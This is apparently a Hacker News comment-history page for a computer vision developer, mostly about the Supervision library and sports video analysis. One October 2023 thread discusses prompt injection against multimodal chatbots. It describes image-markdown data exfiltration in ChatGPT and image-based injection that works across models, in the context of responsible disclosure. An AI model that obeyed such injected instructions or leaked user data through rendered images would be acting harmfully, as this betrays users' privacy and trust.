More

SkalskiP · 2025-12-16T21:07:18 1765919238

code: https://colab.research.google.com/github/roboflow-ai/noteboo...

- player and number detection with RF-DETR

- player tracking with SAM2

- team clustering with SigLIP, UMAP and K-Means

- number recognition with SmolVLM2

- perspective conversion with homography

- player trajectory correction

- shot detection and classification

SkalskiP · on Sept 3, 2024

use computer vision to automatically extract player and ball position, plot it on pitch radar, and calculate advanced metrics

SkalskiP · on Aug 2, 2024

yup! the point here is to show step by step how to perform video segmentation with SAM2

SkalskiP · on March 25, 2024

Hi! Supervision does not run models, but it connects to existing detection and segmentation libraries, allowing you to do more advanced stuff easily. Take a look here to get a high-level overview: https://supervision.roboflow.com/latest/how_to/detect_and_an....

As for Roboflow, you can use the `inference` package to run (among other things) all Roboflow Universe models locally. Take a look at README examples: https://github.com/roboflow/inference.

anhner · on March 26, 2024

Thank you!

SkalskiP · on March 25, 2024

You can always slice the images into smaller ones, run detection on each tile, and combine results. Supervision has a utility for this - https://supervision.roboflow.com/latest/detection/tools/infe..., but it only works with detections. You can get a much more accurate result this way. Here is some side-by-side comparison: https://github.com/roboflow/supervision/releases/tag/0.14.0.

SkalskiP · on March 25, 2024

Hi swyx! The easiest way would be to train a custom model to detect raised hands. I found one on Roboflow - https://universe.roboflow.com/search?q=raised%20hand. I'm not sure how good it would be on your images, so I'd recommend adding some of your pictures. Then you just detect hands and detect people and calculate the ratio.

SkalskiP · on March 25, 2024

Hi everyone! I'm one of the maintainers of Supervision. Thanks for putting our project on the HN front page. It really made my day!

SkalskiP · on March 25, 2024

Hi @eloisus! I'm the creator of Supervision. Over the years, I've noticed that there are certain code snippets I find myself rewriting for each of my computer vision projects. My friends in the field have expressed similar frustrations. While OpenCV is fantastic, it can be verbose, and its API is often inconsistent and hard to remember.

Regarding "drawing detections on an image or video," we aim for maximum flexibility. We offer 18 different annotators for detection and segmentation models, available at https://supervision.roboflow.com/latest/annotators. Each annotator is customizable and can be combined with others. Moreover, we strive to simplify the integration of these annotators with the most popular computer vision libraries.

Edit: I just check your LinkedIn. I think we met on CVPR last year.

eloisius · on March 25, 2024

Totally agree on OpenCV's Python API being hard to use. If your goals are to build something as foundational as OpenCV, but with a Python-native interface I'd be excited about that.

I hope I don't come off as critical, I appreciate the work you're doing. I'd really like to see this take off. My only point is that tasks like annotating a video with tracking are things I've only seen in demos. If I could custom-order the reusable parts I want, it would include geometry, camera transforms, lens distortion, etc. Your polygon zone filtering looks imminently useful. Maybe I should shut up and just contribute something.

I remember meeting you! Maybe I'll see you in Seattle this year.

SkalskiP · on March 25, 2024

Oh my, if you'd like to contribute lens distortion removal... That would make me super happy!

I'm 95% sure I'll be in Seattle this year.

SkalskiP · on Oct 18, 2023

Hi @simonw your tweets were motivation for me to write this blogpost. Same with this one: https://blog.roboflow.com/chatgpt-code-interpreter-computer-... when I dove deep into Code Interpreter. Most of my jailbreaking and prompt injection adventures are linked to you. Thanks a lot!

wunderwuzzi23 · on Oct 18, 2023

Great to see this getting more traction.

Two things I wanted to add:

1) The image markdown data exfil was disclosed to OpenAI in April this year, but still no fix. It impacts all areas of ChatGPT (e.g. browsing, plugins, code interpreter - beta features) and now image analysis (a default feature). Other vendors have fixed this attack vector via stricter Content-Security-Policy (e.g Bing Chat) or not rendering image markdown.

2) Image based injection work across models, e.g. also applies to Bard and Bing Chat. There was a brief discussion on here in July about it (https://news.ycombinator.com/item?id=36718721) about a first demo.

simonw · on Oct 18, 2023

It's a good explanation - the more people writing about this stuff the better!

SkalskiP · on Oct 18, 2023

You are asking in the context of this blogpost?